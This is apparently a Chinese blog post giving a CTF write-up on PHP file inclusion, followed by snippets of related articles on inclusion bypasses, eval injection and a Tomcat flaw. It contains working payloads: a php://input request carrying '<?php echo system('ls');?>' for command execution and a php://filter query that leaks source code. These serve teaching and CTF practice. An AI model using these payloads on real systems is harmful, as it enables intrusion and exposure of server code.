文件包含漏洞

最新推荐文章于 2023-08-31 21:01:41 发布
最新推荐文章于 2023-08-31 21:01:41 发布
阅读量167 收藏
点赞数
分类专栏: web类 文章标签: 文件包含漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChenZIDu/article/details/101147061
版权

PHP输入流

php://input
php://input可以读取没有处理过的POST数据,也可以获取get的
php://input不能用于enctype=multipart/form-data”

首先看
在这里插入图片描述
题目给我们看的是phpinfo.php
提示说文件包含漏洞,php输入流使用,用Burp来首先抓包
在这里插入图片描述
然后再URL那一栏加上

?path=php://input
再在下方写入我们要传入的东西
<?php echo system('ls');?>

在这里插入图片描述
然后会爆出下面的目录在这里插入图片描述
除了第一个目录基本都试过了,所以我们试试第一个目录,用php://filter

?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

得到一个base64位编码:在这里插入图片描述
解密后得到flag

[RoarCTF 2019]Easy Java
ChenZIDu的博客
12-13 5358
WEB-INF主要通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码 首先看到一个页面,点击下help看看啥情况。 发现输出一串 java.io.FileNotFoundException:{help.docx} 可能是报错信息,打开Brup截取请求信息 GET /Download?filename=help.docx HTT...
文件包含技巧拓展】————4、文件包含漏洞(下)
Fly_鹏程万里
01-30 466
之前已经总结了一次文件包含漏洞相关的知识点,最近一段时间做CTF又遇到了不少以前没见过的包含新姿势,这里在总结一下,以后看的时候方便一些。 phar LFI 0x01 什么是phar文件 phar是一个文件归档的包,类似于Java中的Jar文件,方便了PHP模块的迁移。 php中默认安装了这个模块。 0x02 创建一个phar文件 在创建phar文件的时候要注意phar.readonl...
php:input用法,php://input的使用方法
weixin_30295121的博客
04-03 1378
实践中关于php://input用法总结:1、只有Content-Type为application/x-www-data-urlencoded时,php://input数据才跟$_POST数据相一致。2、PHP不能识别的Content-Type类型的时候,会将http请求包中相应的数据填入变量$HTTP_RAW_POST_DATA3、只有Coentent-Type为multipart/form-d...
文件包含漏洞(绕过姿势)
求天下者,积少成多
06-01 1万+
文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell.php代码内容:123<?p
jsp的文件包含漏洞
weixin_30549175的博客
07-24 477
jsp的文件包含分静态包含的动态包含两种: 静态包含:<%@include file="top.jsp"%> 动态包含:<jsp:include page="top.jsp" /> 两者的区别我就不赘述了。 就目前了解静态包含是不存在问题的,因为file的参数不能动态赋值 而动态包含是存在问题的 我们常说的php文件包含有本地文件包含和远程文件包含两种 所以我...
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 7万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞实战
yuan_boss的博客
08-31 1799
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 4686
文件包含漏洞就是使用函数去包含任意文件的时候,当包含的文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 3222
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
通达OA v11.8 getway.php 远程文件包含漏洞.md
最新发布
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞是Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
eval代码执行漏洞
ChenZIDu的博客
09-22 5952
eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 看一则样例 <?php include "flag.php"; $a = @$_REQUEST['hello']; eva...
phps的利用(phps文件就是php的源代码文件)
ChenZIDu的博客
09-22 3357
phps文件就是php的源代码文件,通常用于提供给用户(访问者)直接通过Web浏览器查看php代码的内容。 因为用户无法直接通过Web浏览器“看到”php文件的内容,所以需要用phps文件代替。 得到源码,发现是当id等于admin的时候出flag 不过在此之前他要进行一次url的解码,加上浏览器的,一共是两次。 直接get方法 id=admin是不能通过的 URL其实就是16...
网鼎杯2020朱雀组-web
ChenZIDu的博客
05-18 3083
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2816
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
.user.ini上传绕过
ChenZIDu的博客
09-22 2789
题目是2019SUCTF的Checkln 先进入题目看到的是: 文件上传,经过多方尝试之后发现只能上传图片格式的,看了题解之后发现他是 getimagesize可以用普通文件,通过设置height以及width来绕过。 这题要求我们使用.user.ini 所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值